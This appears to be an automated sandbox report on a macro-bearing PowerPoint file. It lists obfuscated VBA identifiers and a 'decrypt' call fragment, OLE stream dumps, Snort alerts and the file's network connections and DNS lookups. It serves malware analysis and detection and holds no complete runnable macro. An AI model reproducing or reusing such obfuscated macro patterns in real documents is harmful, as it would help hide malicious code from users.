                                                                                                                                                                                                            "kPKLJ"
                                                                                                                                                                                                            foLGkmSmsApUe()
                                                                                                                                                                                                            YfIVUlprjIYPAikFimA
                                                                                                                                                                                                            PvrrqugmtK()
                                                                                                                                                                                                            (decrypt("N{{x{*",
                                                                                                                                                                                                            wuQEVHLmLQ:
                                                                                                                                                                                                            RJjLqbVKfVMalTSGsT()
                                                                                                                                                                                                            calcmm):
                                                                                                                                                                                                            AKQMZpqLNQucEUBHbjY()
                                                                                                                                                                                                            QqQcVolIeCurCTiDrA:
                                                                                                                                                                                                            pBexdASsSeYqawg
                                                                                                                                                                                                            cafPQeuVUl()
                                                                                                                                                                                                            pUQQPUFLTkKJaPS
                                                                                                                                                                                                            QUGzGlLxMQTLkNscYMh:
                                                                                                                                                                                                            xfhBejwGcpdOqMLnUm
                                                                                                                                                                                                            DnxDzLdezAJ
                                                                                                                                                                                                            huFonbMoKQlSk:
                                                                                                                                                                                                            yYLJDVSpLkpmxA
                                                                                                                                                                                                            String
                                                                                                                                                                                                            fDxbdJejrhMVVUawDKpB()
                                                                                                                                                                                                            NAnOljLtKwAaALFYUs
                                                                                                                                                                                                            "SoqzJEixPkDxnScc"
                                                                                                                                                                                                            HPQaytVYEKemcH:
                                                                                                                                                                                                            SADYAESdyLyl()
                                                                                                                                                                                                            aaBJQySxVnzo()
                                                                                                                                                                                                            "PhSQwQicurO"
                                                                                                                                                                                                            Private
                                                                                                                                                                                                            rpugZgKQQmqtk
                                                                                                                                                                                                            LaVESrsScoQkOnFfF
                                                                                                                                                                                                            hgkVcjAbaqg:
                                                                                                                                                                                                            OONSDwDivuKNQIhw
                                                                                                                                                                                                            YVDsMDuHSBAooP()
                                                                                                                                                                                                            YqawgrxtEVk()
VBA Code

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 444
Entropy: 3.11131593238
Base64 Encoded: False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . W i d e s c r e e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 8c 01 00 00 0f 00 00 00 01 00 00 00 80 00 00 00 03 00 00 00 88 00 00 00 04 00 00 00 9c 00 00 00 06 00 00 00 a4 00 00 00 07 00 00 00 ac 00 00 00 08 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0a 00 00 00 c4 00 00 00 17 00 00 00 cc 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 43632
Entropy: 0.550494612512
Base64 Encoded: False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . @ . . . . . . . . . . . ` . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U 2 . . . . . . . . . . M a s t e r M a n a . . . . . . . . . 3 . . . . . . . . . . . M i c r o s o f t O f f i c e P o w e r P o i n t . @ . . . . . . l . . . .
                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 40 aa 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 02 00 00 00 68 00 00 00 04 00 00 00 74 00 00 00 08 00 00 00 80 00 00 00 09 00 00 00 94 00 00 00 12 00 00 00 a0 00 00 00 0a 00 00 00 c4 00 00 00 0c 00 00 00 d0 00 00 00 0d 00 00 00 dc 00 00 00
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 358
Entropy: 5.3465679306
Base64 Encoded: True
                                                                                                                                                                                                            Data ASCII:I D = " { E B D 3 2 E 8 C - 6 5 7 5 - 4 3 D 3 - 9 E 2 A - A 9 4 D E 9 A A 1 2 3 8 } " . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 6 1 4 1 4 6 9 E C 9 7 6 F 9 B 6 F 9 B 6 F 9 B 6 F 9 B " . . D P B = " 9 5 9 7 9 7 E 6 6 9 6 4 6 A 6 4 6 A 6 4 " . . G C = " 1 4 1 6 1 6 6 7 E A E 7 E B E 7 E B 1 8 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0 0
                                                                                                                                                                                                            Data Raw:49 44 3d 22 7b 45 42 44 33 32 45 38 43 2d 36 35 37 35 2d 34 33 44 33 2d 39 45 32 41 2d 41 39 34 44 45 39 41 41 31 32 33 38 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32 32 30 30
                                                                                                                                                                                                            Stream Path: PROJECTwm, File Type: data, Stream Size: 26
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:PROJECTwm
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:26
                                                                                                                                                                                                            Entropy:2.50738010242
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                                                                                            Data Raw:4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 6034
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:6034
                                                                                                                                                                                                            Entropy:5.43827372365
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                                                                                            Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3544
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_0
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:3544
                                                                                                                                                                                                            Entropy:4.42422055205
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . 1 . . x . H . . C . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 03 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 03 00 00 7e 03 00 00 7e 03 00 00 7e
                                                                                                                                                                                                            Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 100
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_1
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:100
                                                                                                                                                                                                            Entropy:2.94276509873
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M v V D t f s Y 1 . . . . . . . . J L z W D v G F m l . . . . . . .
                                                                                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 08 09 00 00 00 4d 76 56 44 74 66 73 59 31 03 00 00 08 09 00 00 00 4a 4c 7a 57 44 76 47 46 6d 6c 00 00 7f 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 6152
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_2
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:6152
                                                                                                                                                                                                            Entropy:4.28073400057
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . Q . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . Y . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . .
                                                                                                                                                                                                            Data Raw:72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 1d 00 00 00 36 00 00 00 51 0a 00 00 00 00 00 00 39 0a 00 00 00 00 00 00 89 02 00 00 00 00 02 00 81 0a 00 00 00 00 00 00 69 0a 00 00 00 00 00 00 b1 0a 00 00 00 00 00 00 99 0a 00 00 00 00 00 00 c9 0a 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 1157
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_3
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:1157
                                                                                                                                                                                                            Entropy:2.39133589617
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . ! . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . I . . . . . . . . . . ` . . . . .
                                                                                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 24 00 a9 00 00 00 00 00 02 00 01 00 00 60 00 00 fc ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 0f 24 00
                                                                                                                                                                                                            Stream Path: VBA/dir, File Type: data, Stream Size: 466
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/dir
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:466
                                                                                                                                                                                                            Entropy:6.14668442859
                                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 3 . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                                                                            Data Raw:01 ce b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 33 03 ee 61 19 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/13/21-13:44:28.704347 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.139
01/13/21-13:44:28.704347 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.139
01/13/21-13:44:28.752557 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.139 | 192.168.2.22
01/13/21-13:44:39.425379 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:39.425379 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:39.473256 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:44:40.309136 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:40.309136 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:40.357440 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:44:54.943988 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:54.943988 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:44:54.991950 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:45:07.769872 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:07.769872 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:07.817836 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:45:16.402306 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:16.402306 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:16.450089 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:45:26.420128 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:26.420128 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.102
01/13/21-13:45:26.468019 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.102 | 192.168.2.22
01/13/21-13:45:29.676235 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
01/13/21-13:45:49.689493 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.22 | 172.217.218.139
01/13/21-13:45:49.689493 | ICMP | 384 | ICMP PING | | | 192.168.2.22 | 172.217.218.139
01/13/21-13:45:49.737658 | ICMP | 408 | ICMP Echo Reply | | | 172.217.218.139 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 13:44:22.737415075 CET | 49167 | 80 | 192.168.2.22 | 67.199.248.16
Jan 13, 2021 13:44:22.786787987 CET | 80 | 49167 | 67.199.248.16 | 192.168.2.22
Jan 13, 2021 13:44:22.786874056 CET | 49167 | 80 | 192.168.2.22 | 67.199.248.16
Jan 13, 2021 13:44:22.788650990 CET | 49167 | 80 | 192.168.2.22 | 67.199.248.16
Jan 13, 2021 13:44:22.837110996 CET | 80 | 49167 | 67.199.248.16 | 192.168.2.22
Jan 13, 2021 13:44:22.931399107 CET | 80 | 49167 | 67.199.248.16 | 192.168.2.22
Jan 13, 2021 13:44:22.931528091 CET | 49167 | 80 | 192.168.2.22 | 67.199.248.16
Jan 13, 2021 13:44:23.077334881 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.125226974 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.125323057 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.158297062 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.206696987 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.206747055 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.206795931 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.206815004 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.206845045 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.206878901 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.206911087 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.206926107 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.206955910 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.218302965 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.266429901 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
Jan 13, 2021 13:44:23.266521931 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.684679031 CET | 49168 | 443 | 192.168.2.22 | 108.177.127.132
Jan 13, 2021 13:44:23.737174034 CET | 443 | 49168 | 108.177.127.132 | 192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.338148117 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.338385105 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344692945 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344726086 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344754934 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344775915 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344810009 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344820023 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344822884 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365524054 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365571976 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365602016 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365736961 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365767002 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369362116 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369442940 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369494915 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369519949 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372374058 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372406006 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372509003 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429142952 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429317951 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429361105 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429414034 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429454088 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429487944 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.434963942 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435003042 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435097933 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435997963 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436554909 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436602116 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436682940 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439702988 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439744949 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439806938 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.442970991 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.443578959 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.443660975 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.084743023 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.131266117 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.131381989 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.147083044 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.193034887 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194680929 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194725037 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194796085 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.208478928 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.254933119 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.255269051 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.464607954 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.503458023 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.504455090 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.524163961 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.570153952 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150634050 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150665045 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150676012 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150686979 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150695086 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150706053 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150721073 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150950909 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151637077 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151663065 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151740074 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152674913 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152693987 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152786016 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153299093 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153326988 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153419971 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.154486895 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.154514074 CET44349174104.18.49.20192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 13:44:22.673477888 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:22.722846985 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:23.009288073 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:23.073410034 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:24.424066067 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:24.489083052 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:24.489990950 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:24.548269987 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:25.648607969 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:25.715763092 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
